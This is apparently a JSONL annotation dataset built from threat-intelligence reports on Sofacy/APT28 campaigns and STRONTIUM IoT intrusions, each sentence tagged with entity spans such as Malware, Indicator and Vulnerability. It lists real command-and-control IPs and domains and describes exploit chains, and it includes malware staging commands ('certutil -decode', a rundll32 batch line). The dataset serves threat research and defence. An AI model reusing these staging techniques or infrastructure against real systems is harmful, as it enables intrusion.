{"text": "After decrypting the content , the \u2018 onload2 \u2019 function will issue another HTTP GET request with the system data as a parameter , but this time to the C2 using a URL from the \u2018 r4 \u2019 variable .", "spans": [{"start": 75, "end": 79, "label": "Indicator"}, {"start": 151, "end": 153, "label": "System"}]}
{"text": "When this request completes , the event listener will call the \u2018 onload3 \u2019 function .", "spans": []}
{"text": "The \u2018 onload3 \u2019 function will take the response to the HTTP request in \u2018 onload2 \u2019 and treat it as the payload .", "spans": [{"start": 55, "end": 59, "label": "Indicator"}]}
{"text": "The ActionScript will read each byte of the C2 response and get the hexadecimal value .", "spans": [{"start": 4, "end": 16, "label": "System"}, {"start": 44, "end": 46, "label": "System"}]}
{"text": "This hexadecimal string will most likely be a string of shellcode that will contain and decrypt the ultimate portable executable ( PE ) payload .", "spans": [{"start": 109, "end": 128, "label": "System"}, {"start": 131, "end": 133, "label": "System"}]}
{"text": "The string of comma separated hexadecimal values is passed as a parameter when loading the SWF file downloaded in \u2018 onload2 \u2019 .", "spans": [{"start": 91, "end": 94, "label": "System"}]}
{"text": "This function creates an event listener for when the SWF file is successfully loaded , which will call the \u2018 onload5 \u2019 function .", "spans": [{"start": 53, "end": 56, "label": "System"}]}
{"text": "The \u2018 onload5 \u2019 function is responsible for adding the newly loaded SWF object as a child object .", "spans": [{"start": 68, "end": 71, "label": "System"}]}
{"text": "This loads the SWF file , effectively running the malicious code on the system .", "spans": [{"start": 15, "end": 18, "label": "System"}]}
{"text": "During our analysis , we were unable to coerce the C2 into providing a malicious SWF or payload .", "spans": [{"start": 51, "end": 53, "label": "System"}, {"start": 81, "end": 84, "label": "System"}]}
{"text": "As mentioned in our previous blogs on DealersChoice , the payload of choice for previous variants was SofacyCarberp ( Seduploader ) , but we have no evidence to suggest this tool was used in this attack .", "spans": [{"start": 38, "end": 51, "label": "System"}, {"start": 102, "end": 115, "label": "Malware"}, {"start": 118, "end": 129, "label": "Malware"}]}
{"text": "We are actively researching and will update this blog in the event we discover the malicious Flash object and payload delivered in this attack .", "spans": [{"start": 93, "end": 98, "label": "System"}]}
{"text": "The delivery document used in this attack was last modified by a user named \u2018 Nick Daemoji \u2019 , which provides a linkage to previous Sofacy related delivery documents .", "spans": [{"start": 132, "end": 138, "label": "Organization"}]}
{"text": "The previous documents that used this user name were macro-laden delivery documents that installed SofacyCarberp S-MAL/Seduploader payloads , as discussed in Talos \u2019 blog .", "spans": [{"start": 99, "end": 130, "label": "Malware"}]}
{"text": "This overlap also points to a similar social engineering theme between these two campaigns , as both used content from upcoming military and defense conferences as a lure .", "spans": []}
{"text": "The Sofacy threat group continues to use their DealersChoice framework to exploit Flash vulnerabilities in their attack campaigns .", "spans": [{"start": 4, "end": 10, "label": "Organization"}, {"start": 47, "end": 60, "label": "System"}, {"start": 82, "end": 87, "label": "System"}]}
{"text": "In the most recent variant , Sofacy modified the internals of the malicious scripts , but continues to follow the same process used by previous variants by obtaining a malicious Flash object and payload directly from the C2 server .", "spans": [{"start": 29, "end": 35, "label": "Organization"}, {"start": 178, "end": 183, "label": "System"}, {"start": 221, "end": 223, "label": "System"}]}
{"text": "Unlike previous samples , this DealersChoice used a DOCX delivery document that required the user to scroll through the document to trigger the malicious Flash object .", "spans": [{"start": 31, "end": 44, "label": "System"}, {"start": 52, "end": 56, "label": "System"}, {"start": 154, "end": 159, "label": "System"}]}
{"text": "DealersChoice :", "spans": [{"start": 0, "end": 13, "label": "System"}]}
{"text": "0cd9ac328d858d8d83c9eb73bfdc59a958873b3d71b24c888d7408d9512a41d7 ( Defence&Security_2018_Conference_Agenda.docx ) ndpmedia24.com .", "spans": [{"start": 0, "end": 64, "label": "Indicator"}, {"start": 67, "end": 111, "label": "Indicator"}, {"start": 114, "end": 128, "label": "Indicator"}]}
{"text": "Corporate IoT \u2013 a path to intrusion .", "spans": [{"start": 10, "end": 13, "label": "System"}]}
{"text": "Several sources estimate that by the year 2020 some 50 billion IoT devices will be deployed worldwide .", "spans": [{"start": 63, "end": 66, "label": "System"}]}
{"text": "IoT devices are purposefully designed to connect to a network and many are simply connected to the internet with little management or oversight .", "spans": [{"start": 0, "end": 3, "label": "System"}]}
{"text": "Such devices still must be identifiable , maintained , and monitored by security teams , especially in large complex enterprises .", "spans": []}
{"text": "Some IoT devices may even communicate basic telemetry back to the device manufacturer or have means to receive software updates .", "spans": [{"start": 5, "end": 8, "label": "System"}]}
{"text": "In most cases however , the customers \u2019 IT operation center don\u2019t know they exist on the network .", "spans": []}
{"text": "In 2016 , the Mirai botnet was discovered by the malware research group MalwareMustDie .", "spans": [{"start": 14, "end": 19, "label": "Malware"}, {"start": 72, "end": 86, "label": "Organization"}]}
{"text": "The botnet initially consisted of IP cameras and basic home routers , two types of IoT devices commonly found in the household .", "spans": [{"start": 83, "end": 86, "label": "System"}]}
{"text": "As more variants of Mirai emerged , so did the list IoT devices it was targeting .", "spans": [{"start": 20, "end": 25, "label": "Malware"}, {"start": 52, "end": 55, "label": "System"}]}
{"text": "The source code for the malware powering this botnet was eventually leaked online .", "spans": []}
{"text": "In 2018 , hundreds of thousands of home and small business networking and storage devices were compromised and loaded with the so-called \u201c VPN Filter \u201d malware .", "spans": [{"start": 139, "end": 149, "label": "Malware"}]}
{"text": "The FBI has publicly attributed this activity to a nation-state actor and took subsequent actions to disrupt this botnet , although the devices would remain vulnerable to re-infection unless proper firmware or security controls were put in place by the user .", "spans": [{"start": 4, "end": 7, "label": "Organization"}]}
{"text": "There were also multiple press reports of cyber-attacks on several devices during the opening ceremonies for the 2018 Olympic Games in PyeongChang .", "spans": [{"start": 118, "end": 131, "label": "Organization"}]}
{"text": "Officials did confirm a few days later that they were a victim of malicious cyber-attacks that prevented attendees from printing their tickets to the Games and televisions and internet access in the main press center simply stopped working .", "spans": [{"start": 150, "end": 155, "label": "Organization"}]}
{"text": "In April , security researchers in the Microsoft Threat Intelligence Center discovered infrastructure of a known adversary communicating to several external devices .", "spans": [{"start": 39, "end": 48, "label": "Organization"}, {"start": 49, "end": 75, "label": "Organization"}]}
{"text": "Further research uncovered attempts by the actor to compromise popular IoT devices ( a VOIP phone , an office printer , and a video decoder ) across multiple customer locations .", "spans": [{"start": 71, "end": 74, "label": "System"}, {"start": 87, "end": 97, "label": "System"}, {"start": 103, "end": 117, "label": "System"}, {"start": 126, "end": 139, "label": "System"}]}
{"text": "The investigation uncovered that an actor had used these devices to gain initial access to corporate networks .", "spans": []}
{"text": "In two of the cases , the passwords for the devices were deployed without changing the default manufacturer \u2019s passwords and in the third instance the latest security update had not been applied to the device .", "spans": []}
{"text": "These devices became points of ingress from which the actor established a presence on the network and continued looking for further access .", "spans": []}
{"text": "Once the actor had successfully established access to the network , a simple network scan to look for other insecure devices allowed them to discover and move across the network in search of higher-privileged accounts that would grant access to higher-value data .", "spans": []}
{"text": "After gaining access to each of the IoT devices , the actor ran tcpdump to sniff network traffic on local subnets .", "spans": [{"start": 36, "end": 39, "label": "System"}]}
{"text": "They were also seen enumerating administrative groups to attempt further exploitation .", "spans": []}
{"text": "As the actor moved from one device to another , they would drop a simple shell script to establish persistence on the network which allowed extended access to continue hunting .", "spans": []}
{"text": "Analysis of network traffic showed the devices were also communicating with an external command and control ( C2 ) server .", "spans": [{"start": 88, "end": 107, "label": "System"}, {"start": 110, "end": 112, "label": "System"}]}
{"text": "The following IP addresses are believed to have been used by the actor for command and control ( C2 ) during these intrusions :", "spans": [{"start": 75, "end": 94, "label": "System"}, {"start": 97, "end": 99, "label": "System"}]}
{"text": "167.114.153.55 94.237.37.28 82.118.242.171 31.220.61.251 128.199.199.187 .", "spans": [{"start": 0, "end": 14, "label": "Indicator"}, {"start": 15, "end": 27, "label": "Indicator"}, {"start": 28, "end": 42, "label": "Indicator"}, {"start": 43, "end": 56, "label": "Indicator"}, {"start": 57, "end": 72, "label": "Indicator"}]}
{"text": "We attribute the attacks on these customers using three popular IoT devices to an activity group that Microsoft refers to as STRONTIUM .", "spans": [{"start": 64, "end": 67, "label": "System"}, {"start": 102, "end": 111, "label": "Organization"}, {"start": 125, "end": 134, "label": "Organization"}]}
{"text": "Since we identified these attacks in the early stages , we have not been able to conclusively determine what STRONTIUM \u2019s ultimate objectives were in these intrusions .", "spans": [{"start": 109, "end": 118, "label": "Organization"}]}
{"text": "Over the last twelve months , Microsoft has delivered nearly 1400 nation-state notifications to those who have been targeted or compromised by STRONTIUM .", "spans": [{"start": 30, "end": 39, "label": "Organization"}, {"start": 143, "end": 152, "label": "Organization"}]}
{"text": "One in five notifications of STRONTIUM activity were tied to attacks against non-governmental organizations , think tanks , or politically affiliated organizations around the world .", "spans": [{"start": 29, "end": 38, "label": "Organization"}]}
{"text": "The remaining 80% of STRONTIUM attacks have largely targeted organizations in the following sectors : government , IT , military , defense , medicine , education , and engineering .", "spans": [{"start": 21, "end": 30, "label": "Organization"}]}
{"text": "We have also observed and notified STRONTIUM attacks against Olympic organizing committees , anti-doping agencies , and the hospitality industry .", "spans": [{"start": 35, "end": 44, "label": "Organization"}, {"start": 61, "end": 68, "label": "Organization"}]}
{"text": "The \u201c VPN Filter \u201d malware has also been attributed to STRONTIUM by the FBI .", "spans": [{"start": 6, "end": 16, "label": "Malware"}, {"start": 55, "end": 64, "label": "Organization"}, {"start": 72, "end": 75, "label": "Organization"}]}
{"text": "Today we are sharing this information to raise awareness of these risks across the industry and calling for better enterprise integration of IoT devices , particularly the ability to monitor IoT device telemetry within enterprise networks .", "spans": [{"start": 141, "end": 144, "label": "System"}, {"start": 191, "end": 194, "label": "System"}]}
{"text": "Today , the number of deployed IoT devices outnumber the population of personal computers and mobile phones , combined .", "spans": [{"start": 31, "end": 34, "label": "System"}, {"start": 80, "end": 89, "label": "System"}, {"start": 94, "end": 107, "label": "System"}]}
{"text": "With each networked IoT device having its own separate network stack , it \u2019s quite easy to see the need for better enterprise management , especially in today \u2019s \u201c bring your own device \u201d world .", "spans": [{"start": 20, "end": 23, "label": "System"}]}
{"text": "While much of the industry focuses on the threats of hardware implants , we can see in this example that adversaries are happy to exploit simpler configuration and security issues to achieve their objectives .", "spans": []}
{"text": "These simple attacks taking advantage of weak device management are likely to expand as more IoT devices are deployed in corporate environments .", "spans": [{"start": 93, "end": 96, "label": "System"}]}
{"text": "Upon conclusion of our investigation , we shared this information with the manufacturers of the specific devices involved and they have used this event to explore new protections in their products .", "spans": []}
{"text": "However , there is a need for broader focus across IoT in general , both from security teams at organizations that need to be more aware of these types of threats , as well as from IoT device makers who need to provide better enterprise support and monitoring capabilities to make it easier for security teams to defend their networks .", "spans": [{"start": 51, "end": 54, "label": "System"}, {"start": 181, "end": 184, "label": "System"}]}
{"text": "Below are a series of indicators Microsoft has observed as active during the STRONTIUM activity discussed in this article .", "spans": [{"start": 33, "end": 42, "label": "Organization"}, {"start": 77, "end": 86, "label": "Organization"}]}
{"text": "Command-and-Control ( C2 ) IP addresses :", "spans": [{"start": 0, "end": 19, "label": "System"}, {"start": 22, "end": 24, "label": "System"}]}
{"text": "167.114.153.55 94.237.37.28 82.118.242.171 31.220.61.251 128.199.199.187 .", "spans": [{"start": 0, "end": 14, "label": "Indicator"}, {"start": 15, "end": 27, "label": "Indicator"}, {"start": 28, "end": 42, "label": "Indicator"}, {"start": 43, "end": 56, "label": "Indicator"}, {"start": 57, "end": 72, "label": "Indicator"}]}
{"text": "Operation RussianDoll : Adobe & Windows Zero-Day Exploits Likely Leveraged by Russia \u2019s APT28 in Highly-Targeted Attack .", "spans": [{"start": 24, "end": 29, "label": "System"}, {"start": 32, "end": 39, "label": "System"}, {"start": 40, "end": 48, "label": "Vulnerability"}, {"start": 88, "end": 93, "label": "Organization"}]}
{"text": "FireEye Labs recently detected a limited APT campaign exploiting zero-day vulnerabilities in Adobe Flash and a brand-new one in Microsoft Windows .", "spans": [{"start": 0, "end": 12, "label": "Organization"}, {"start": 65, "end": 73, "label": "Vulnerability"}, {"start": 93, "end": 104, "label": "System"}, {"start": 128, "end": 137, "label": "Organization"}, {"start": 138, "end": 145, "label": "System"}]}
{"text": "Using the Dynamic Threat Intelligence Cloud ( DTI ) , FireEye researchers detected a pattern of attacks beginning on April 13th , 2015 .", "spans": [{"start": 10, "end": 43, "label": "System"}, {"start": 46, "end": 49, "label": "System"}, {"start": 54, "end": 61, "label": "Organization"}]}
{"text": "Adobe independently patched the vulnerability ( CVE-2015-3043 ) in APSB15-06 .", "spans": [{"start": 0, "end": 5, "label": "System"}, {"start": 48, "end": 61, "label": "Vulnerability"}]}
{"text": "Through correlation of technical indicators and command and control infrastructure , FireEye assess that APT28 is probably responsible for this activity .", "spans": [{"start": 48, "end": 67, "label": "System"}, {"start": 85, "end": 92, "label": "Organization"}, {"start": 105, "end": 110, "label": "Organization"}]}
{"text": "Microsoft is aware of the outstanding local privilege escalation vulnerability in Windows ( CVE-2015-1701 ) .", "spans": [{"start": 0, "end": 9, "label": "Organization"}, {"start": 82, "end": 89, "label": "System"}, {"start": 92, "end": 105, "label": "Vulnerability"}]}
{"text": "While there is not yet a patch available for the Windows vulnerability , updating Adobe Flash to the latest version will render this in-the-wild exploit innocuous .", "spans": [{"start": 49, "end": 56, "label": "System"}, {"start": 82, "end": 93, "label": "System"}]}
{"text": "We have only seen CVE-2015-1701 in use in conjunction with the Adobe Flash exploit for CVE-2015-3043 .", "spans": [{"start": 18, "end": 31, "label": "Vulnerability"}, {"start": 63, "end": 74, "label": "System"}, {"start": 87, "end": 100, "label": "Vulnerability"}]}
{"text": "The Microsoft Security Team is working on a fix for CVE-2015-1701 .", "spans": [{"start": 4, "end": 27, "label": "Organization"}, {"start": 52, "end": 65, "label": "Vulnerability"}]}
{"text": "The high level flow of the exploit is as follows :", "spans": []}
{"text": "User clicks link to attacker controlled website .", "spans": []}
{"text": "HTML/JS launcher page serves Flash exploit .", "spans": [{"start": 0, "end": 7, "label": "System"}, {"start": 29, "end": 34, "label": "System"}]}
{"text": "Flash exploit triggers CVE-2015-3043 , executes shellcode .", "spans": [{"start": 0, "end": 5, "label": "System"}, {"start": 23, "end": 36, "label": "Vulnerability"}, {"start": 48, "end": 57, "label": "System"}]}
{"text": "Shellcode downloads and runs executable payload .", "spans": [{"start": 0, "end": 9, "label": "System"}]}
{"text": "Executable payload exploits local privilege escalation ( CVE-2015-1701 ) to steal System token .", "spans": [{"start": 57, "end": 70, "label": "Vulnerability"}]}
{"text": "The Flash exploit is served from unobfuscated HTML/JS .", "spans": [{"start": 4, "end": 9, "label": "System"}, {"start": 46, "end": 53, "label": "System"}]}
{"text": "The launcher page picks one of two Flash files to deliver depending upon the target \u2019s platform ( Windows 32 versus 64bits ) .", "spans": [{"start": 35, "end": 40, "label": "System"}, {"start": 98, "end": 108, "label": "System"}]}
{"text": "The Flash exploit is mostly unobfuscated with only some light variable name mangling .", "spans": [{"start": 4, "end": 9, "label": "System"}]}
{"text": "The attackers relied heavily on the CVE-2014-0515 Metasploit module , which is well documented .", "spans": [{"start": 36, "end": 49, "label": "Vulnerability"}, {"start": 50, "end": 60, "label": "System"}]}
{"text": "It is ROPless , and instead constructs a fake vtable for a FileReference object that is modified for each call to a Windows API .", "spans": [{"start": 6, "end": 13, "label": "System"}, {"start": 116, "end": 123, "label": "System"}, {"start": 124, "end": 127, "label": "System"}]}
{"text": "The payload exploits a local privilege escalation vulnerability in the Windows kernel if it detects that it is running with limited privileges .", "spans": [{"start": 71, "end": 78, "label": "System"}]}
{"text": "It uses the vulnerability to run code from userspace in the context of the kernel , which modifies the attacker \u2019s process token to have the same privileges as that of the System process .", "spans": []}
{"text": "The primary difference between the CVE-2014-0515 metasploit module and this exploit is , obviously , the vulnerability .", "spans": [{"start": 35, "end": 48, "label": "Vulnerability"}]}
{"text": "CVE-2014-0515 exploits a vulnerability in Flash \u2019s Shader processing , whereas CVE-2015-3043 exploits a vulnerability in Flash \u2019s FLV processing .", "spans": [{"start": 0, "end": 13, "label": "Vulnerability"}, {"start": 42, "end": 47, "label": "System"}, {"start": 79, "end": 92, "label": "Vulnerability"}, {"start": 121, "end": 126, "label": "System"}, {"start": 130, "end": 133, "label": "System"}]}
{"text": "The culprit FLV file is embedded within AS3 in two chunks , and is reassembled at runtime .", "spans": [{"start": 12, "end": 15, "label": "System"}]}
{"text": "A buffer overflow vulnerability exists in Adobe Flash Player ( <=17.0.0.134 ) when parsing malformed FLV objects .", "spans": [{"start": 42, "end": 60, "label": "System"}, {"start": 101, "end": 104, "label": "System"}]}
{"text": "Attackers exploiting the vulnerability can corrupt memory and gain remote code execution .", "spans": []}
{"text": "In the exploit , the attacker embeds the FLV object directly in the ActionScript code , and plays the video using NetStream class .", "spans": [{"start": 41, "end": 44, "label": "System"}, {"start": 68, "end": 80, "label": "System"}]}
{"text": "Files of the FLV file format contain a sequence of Tag structures .", "spans": [{"start": 13, "end": 16, "label": "System"}]}
{"text": "Beginning within the data field , all contents of the FLV stream become 0xEE .", "spans": [{"start": 54, "end": 57, "label": "System"}]}
{"text": "Consequently , the data and lastsize fields are mangled .", "spans": []}
{"text": "Since the size is controlled by the attacker , it \u2019s possible to overflow the fixed size buffer with certain data .", "spans": []}
{"text": "As the previous picture demonstrated , the followed Vector object \u2019s length field being overflowed as 0x80007fff , which enables the attacker to read/write arbitrary data within user space .", "spans": []}
{"text": "Shellcode is passed to the exploit from HTML in flashvars .", "spans": [{"start": 0, "end": 9, "label": "System"}, {"start": 40, "end": 44, "label": "System"}]}
{"text": "The shellcode downloads the next stage payload , which is an executable passed in plaintext , to the temp directory with UrlDownloadToFileA , which it then runs with WinExec .", "spans": [{"start": 4, "end": 13, "label": "System"}]}
{"text": "This exploit delivers a malware variant that shares characteristics with the APT28 backdoors CHOPSTICK and CORESHELL malware families , both described in our APT28 whitepaper .", "spans": [{"start": 77, "end": 82, "label": "Organization"}, {"start": 93, "end": 102, "label": "Malware"}, {"start": 107, "end": 116, "label": "Malware"}, {"start": 158, "end": 163, "label": "Organization"}]}
{"text": "The malware uses an RC4 encryption key that was previously used by the CHOPSTICK backdoor .", "spans": [{"start": 71, "end": 89, "label": "Malware"}]}
{"text": "And the C2 messages include a checksum algorithm that resembles those used in CHOPSTICK backdoor communications .", "spans": [{"start": 8, "end": 10, "label": "System"}, {"start": 78, "end": 96, "label": "Malware"}]}
{"text": "In addition , the network beacon traffic for the new malware resembles those used by the CORESHELL backdoor .", "spans": [{"start": 89, "end": 107, "label": "Malware"}]}
{"text": "Like CORESHELL , one of the beacons includes a process listing from the victim host .", "spans": [{"start": 5, "end": 14, "label": "Malware"}]}
{"text": "And like CORESHELL , the new malware attempts to download a second-stage executable .", "spans": [{"start": 9, "end": 18, "label": "Malware"}]}
{"text": "One of the C2 locations for the new payload , 87.236.215.246 , also hosts a suspected APT28 domain ssl-icloud.com .", "spans": [{"start": 11, "end": 13, "label": "System"}, {"start": 46, "end": 60, "label": "Indicator"}, {"start": 86, "end": 91, "label": "Organization"}, {"start": 99, "end": 113, "label": "Indicator"}]}
{"text": "The same subnet ( 87.236.215.0 / 24 ) also hosts several known or suspected APT28 domains .", "spans": [{"start": 18, "end": 30, "label": "Indicator"}, {"start": 76, "end": 81, "label": "Organization"}]}
{"text": "The payload contains an exploit for the unpatched local privilege escalation vulnerability CVE-2015-1701 in Microsoft Windows .", "spans": [{"start": 91, "end": 104, "label": "Vulnerability"}, {"start": 108, "end": 117, "label": "Organization"}, {"start": 118, "end": 125, "label": "System"}]}
{"text": "The exploit uses CVE-2015-1701 to execute a callback in userspace .", "spans": [{"start": 17, "end": 30, "label": "Vulnerability"}]}
{"text": "The callback gets the EPROCESS structures of the current process and the System process , and copies data from the System token into the token of the current process .", "spans": [{"start": 22, "end": 30, "label": "System"}]}
{"text": "Upon completion , the payload continues execution in usermode with the privileges of the System process .", "spans": []}
{"text": "Because CVE-2015-3043 is already patched , this remote exploit will not succeed on a fully patched system .", "spans": [{"start": 8, "end": 21, "label": "Vulnerability"}]}
{"text": "If an attacker wanted to exploit CVE-2015-1701 , they would first have to be executing code on the victim \u2019s machine .", "spans": [{"start": 33, "end": 46, "label": "Vulnerability"}]}
{"text": "Barring authorized access to the victim \u2019s machine , the attacker would have to find some other means , such as crafting a new Flash exploit , to deliver a CVE-2015-1701 payload .", "spans": [{"start": 127, "end": 132, "label": "System"}, {"start": 156, "end": 169, "label": "Vulnerability"}]}
{"text": "Microsoft is aware of CVE-2015-1701 and is working on a fix .", "spans": [{"start": 0, "end": 9, "label": "Organization"}, {"start": 22, "end": 35, "label": "Vulnerability"}]}
{"text": "CVE-2015-1701 does not affect Windows 8 and later .", "spans": [{"start": 0, "end": 13, "label": "Vulnerability"}, {"start": 30, "end": 39, "label": "System"}]}
{"text": "Sofacy Attacks Multiple Government Entities .", "spans": [{"start": 0, "end": 6, "label": "Organization"}]}
{"text": "Release_Time : 2018-02-28", "spans": []}
{"text": "Report_URL : https://unit42.paloaltonetworks.com/unit42-sofacy-attacks-multiple-government-entities/", "spans": []}
{"text": "The Sofacy group ( AKA APT28 , Fancy Bear , STRONTIUM , Sednit , Tsar Team , Pawn Storm ) is a well-known adversary that remains highly active in the new calendar year of 2018 .", "spans": [{"start": 4, "end": 10, "label": "Organization"}, {"start": 23, "end": 28, "label": "Organization"}, {"start": 31, "end": 41, "label": "Organization"}, {"start": 44, "end": 53, "label": "Organization"}, {"start": 56, "end": 62, "label": "Organization"}, {"start": 65, "end": 74, "label": "Organization"}, {"start": 77, "end": 87, "label": "Organization"}]}
{"text": "Unit 42 actively monitors this group due to their persistent nature globally across all industry verticals .", "spans": [{"start": 0, "end": 7, "label": "Organization"}]}
{"text": "Recently , we discovered a campaign launched at various Ministries of Foreign Affairs around the world .", "spans": [{"start": 56, "end": 85, "label": "Organization"}]}
{"text": "Interestingly , there appear to be two parallel efforts within the campaign , with each effort using a completely different toolset for the attacks .", "spans": []}
{"text": "In this blog , we will discuss one of the efforts which leveraged tools that have been known to be associated with the Sofacy group .", "spans": [{"start": 119, "end": 125, "label": "Organization"}]}
{"text": "At the beginning of February 2018 , we discovered an attack targeting two government institutions related to foreign affairs .", "spans": []}
{"text": "These entities are not regionally congruent , and the only shared victimology involves their organizational functions .", "spans": []}
{"text": "Specifically , one organization is geographically located in Europe and the other in North America .", "spans": []}
{"text": "The initial attack vector leveraged a phishing email , using the subject line of Upcoming Defense events February 2018 and a sender address claiming to be from Jane \u2019s 360 defense events events@ihsmarkit.com .", "spans": [{"start": 81, "end": 97, "label": "Organization"}, {"start": 168, "end": 171, "label": "Organization"}, {"start": 187, "end": 207, "label": "Indicator"}]}
{"text": "Jane \u2019s by IHSMarkit is a well-known supplier of information and analysis often times associated with the defense and government sector .", "spans": [{"start": 11, "end": 20, "label": "Organization"}]}
{"text": "Analysis of the email header data showed that the sender address was spoofed and did not originate from IHSMarkit at all .", "spans": [{"start": 16, "end": 21, "label": "System"}, {"start": 104, "end": 113, "label": "Organization"}]}
{"text": "The lure text in the phishing email claims the attachment is a calendar of events relevant to the targeted organizations and contained specific instructions regarding the actions the victim would have to take if they had \u201c trouble viewing the document \u201d .", "spans": []}
{"text": "The attachment itself is an Microsoft Excel XLS document that contains malicious macro script .", "spans": [{"start": 28, "end": 37, "label": "Organization"}, {"start": 38, "end": 43, "label": "System"}, {"start": 44, "end": 47, "label": "System"}, {"start": 81, "end": 86, "label": "System"}]}
{"text": "The document presents itself as a standard macro document but has all of its text hidden until the victim enables macros .", "spans": [{"start": 43, "end": 48, "label": "System"}, {"start": 114, "end": 120, "label": "System"}]}
{"text": "Notably , all of the content text is accessible to the victim even before macros are enabled .", "spans": [{"start": 74, "end": 80, "label": "System"}]}
{"text": "However , a white font color is applied to the text to make it appear that the victim must enable macros to access the content .", "spans": []}
{"text": "The code above changes the font color to black within the specified cell range and presents the content to the user .", "spans": []}
{"text": "On initial inspection , the content appears to be the expected legitimate content , however , closer examination of the document shows several abnormal artifacts that would not exist in a legitimate document .", "spans": []}
{"text": "Figure 2 below shows how the delivery document initially looks and the transformation the content undergoes as the macro runs .", "spans": [{"start": 115, "end": 120, "label": "System"}]}
{"text": "As mentioned in a recent ISC diary entry , the macro gets the contents of cells in column 170 in rows 2227 to 2248 to obtain the base64 encoded payload .", "spans": [{"start": 25, "end": 28, "label": "System"}, {"start": 47, "end": 52, "label": "System"}]}
{"text": "The macro prepends the string \u2014\u2013BEGIN CERTIFICATE\u2014\u2013 to the beginning of the base64 encoded payload and appends \u2014\u2013END CERTIFICATE\u2014\u2013 to the end of the data .", "spans": [{"start": 4, "end": 9, "label": "System"}]}
{"text": "The macro then writes this data to a text file in the C:\\Programdata folder using a random filename with the .txt extension .", "spans": [{"start": 4, "end": 9, "label": "System"}, {"start": 109, "end": 113, "label": "Indicator"}]}
{"text": "The macro then uses the command certutil -decode to decode the contents of this text file and outputs the decoded content to a randomly named file with a .exe extension in the C:\\Programdata folder .", "spans": [{"start": 4, "end": 9, "label": "System"}, {"start": 154, "end": 158, "label": "Indicator"}]}
{"text": "The macro sleeps for two seconds and then executes the newly dropped executable .", "spans": [{"start": 4, "end": 9, "label": "System"}]}
{"text": "The newly dropped executable is a loader Trojan responsible for installing and running the payload of this attack .", "spans": [{"start": 41, "end": 47, "label": "Vulnerability"}]}
{"text": "We performed a more detailed analysis on this loader Trojan , which readers can view in this report \u2019s appendix .", "spans": [{"start": 53, "end": 59, "label": "Vulnerability"}]}
{"text": "Upon execution , the loader will decrypt the embedded payload ( DLL ) using a custom algorithm , decompress it and save it to the following file : %LOCALAPPDATA%\\cdnver.dll .", "spans": [{"start": 64, "end": 67, "label": "System"}, {"start": 147, "end": 172, "label": "Indicator"}]}
{"text": "The loader will then create the batch file %LOCALAPPDATA%\\cdnver.bat , which it will write the following :", "spans": [{"start": 43, "end": 68, "label": "Indicator"}]}
{"text": "start rundll32.exe \u201c C:\\Users\\user\\AppData\\Local\\cdnver.dll \u201d .", "spans": [{"start": 6, "end": 18, "label": "Indicator"}, {"start": 21, "end": 59, "label": "Indicator"}]}
{"text": "The loader Trojan uses this batch file to run the embedded DLL payload .", "spans": [{"start": 11, "end": 17, "label": "Vulnerability"}, {"start": 59, "end": 62, "label": "System"}]}
{"text": "For persistence , the loader will write the path to this batch file to the following registry key .", "spans": []}
{"text": "The cdnver.dll payload installed by the loader executable is a variant of the SofacyCarberp payload , which is used extensively by the Sofacy threat group .", "spans": [{"start": 4, "end": 14, "label": "Indicator"}, {"start": 78, "end": 91, "label": "Malware"}, {"start": 135, "end": 141, "label": "Organization"}]}
{"text": "Overall , SofacyCarberp does initial reconnaissance by gathering system information and sending it to the C2 server prior to downloading additional tools to the system .", "spans": [{"start": 10, "end": 23, "label": "Malware"}, {"start": 106, "end": 108, "label": "System"}]}
{"text": "This variant of SofacyCarberp was configured to use the following domain as its C2 server : cdnverify.net .", "spans": [{"start": 16, "end": 29, "label": "Malware"}, {"start": 80, "end": 82, "label": "System"}, {"start": 92, "end": 105, "label": "Indicator"}]}
{"text": "The loader and the SofacyCarberp sample delivered in this attack is similar to samples we have analyzed in the past but contains marked differences .", "spans": [{"start": 19, "end": 32, "label": "Malware"}]}
{"text": "These differences include a new hashing algorithm to resolve API functions and to find running browser processes for injection , as well as changes to the C2 communication mechanisms .", "spans": [{"start": 61, "end": 64, "label": "System"}, {"start": 155, "end": 157, "label": "System"}]}
{"text": "It appears that Sofacy may have used an open-source tool called Luckystrike to generate the delivery document and/or the macro used in this attack .", "spans": [{"start": 16, "end": 22, "label": "Organization"}, {"start": 64, "end": 75, "label": "System"}, {"start": 121, "end": 126, "label": "System"}]}
{"text": "Luckystrike , which was presented at DerbyCon 6 in September 2016 , is a Microsoft PowerShell based tool that generates malicious delivery documents by allowing a user to add a macro to an Excel or Word document to execute an embedded payload .", "spans": [{"start": 0, "end": 11, "label": "System"}, {"start": 37, "end": 45, "label": "Organization"}, {"start": 73, "end": 82, "label": "Organization"}, {"start": 83, "end": 93, "label": "System"}, {"start": 177, "end": 182, "label": "System"}, {"start": 189, "end": 194, "label": "System"}, {"start": 198, "end": 202, "label": "System"}]}
{"text": "We believe Sofacy used this tool , as the macro within their delivery document closely resembles the macros found within Luckystrike .", "spans": [{"start": 11, "end": 17, "label": "Organization"}, {"start": 42, "end": 47, "label": "System"}, {"start": 121, "end": 132, "label": "System"}]}
{"text": "To confirm our suspicions , we generated a malicious Excel file with Luckystrike and compared its macro to the macro found within Sofacy \u2019s delivery document .", "spans": [{"start": 53, "end": 58, "label": "System"}, {"start": 69, "end": 80, "label": "System"}, {"start": 98, "end": 103, "label": "System"}, {"start": 111, "end": 116, "label": "System"}, {"start": 130, "end": 136, "label": "Organization"}]}
{"text": "We found that there was only one difference between the macros besides the random function name and random cell values that the Luckystrike tool generates for each created payload .", "spans": [{"start": 128, "end": 139, "label": "System"}]}
{"text": "The one non-random string difference was the path to the \u201c .txt \u201d and \u201c .exe \u201d files within the command \u201c certutil -decode \u201d , as the Sofacy document used \u201c C:\\Programdata\\ \u201d for the path whereas the Luckystrike document used the path stored in the Application.UserLibraryPath environment variable .", "spans": [{"start": 59, "end": 63, "label": "Indicator"}, {"start": 72, "end": 76, "label": "Indicator"}, {"start": 134, "end": 140, "label": "Organization"}, {"start": 200, "end": 211, "label": "System"}, {"start": 249, "end": 276, "label": "Indicator"}]}
{"text": "Figure 3 below shows a diff with the LuckyStrike macro on the left and Sofacy macro on the right , where everything except the file path and randomly generated values in the macro are exactly the same , including the obfuscation attempts that use concatenation to build strings .", "spans": [{"start": 37, "end": 48, "label": "System"}, {"start": 49, "end": 54, "label": "System"}, {"start": 71, "end": 77, "label": "Organization"}, {"start": 78, "end": 83, "label": "System"}, {"start": 174, "end": 179, "label": "System"}]}
{"text": "With much of our research , our initial direction and discovery of emerging threats is generally some combination of previously observed behavioral rulesets or relationships .", "spans": []}
